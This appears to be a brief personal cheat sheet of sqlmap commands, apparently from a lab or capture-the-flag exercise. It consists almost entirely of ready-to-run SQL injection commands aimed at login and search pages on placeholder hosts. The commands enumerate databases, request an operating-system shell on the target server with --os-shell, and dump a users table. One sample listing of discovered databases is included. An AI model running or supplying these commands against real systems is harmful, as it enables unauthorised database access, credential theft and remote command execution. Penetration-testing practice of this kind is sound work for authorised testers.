SQLMap
Probe to find the Front-End DB
sqlmap -u "http://xyz.com/index.php" --data "username=test&password=test&submit=Submit" --method=POST --level=3 --dbms=mysql --dbs
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp ..Answer!
Discover OS
sqlmap -u http://xyz.com/ --data="username=test&password=test&debug=false"
sqlmap -u http://xyz.com/ --data="username=test&password=test&debug=false" --level=5
sqlmap -u http://xyz.com --data="username=test&password=test&debug=false" --method POST --os-shell
sqlmap -u http://xyz.com --data="username=test&password=test&submit=Submit" --method POST --os-shell
Favorites
sqlmap -u http://$IP/login.php --data="username=test&passwd=test&submit=Submit" --method POST --dbs --batch
sqlmap -u http://$IP/login.php --data="username=test&passwd=test&submit=Submit" --method POST --os-shell
Attempt
sqlmap -u "http://$IP/staff_search.php?search=bob" --dump -D website -T users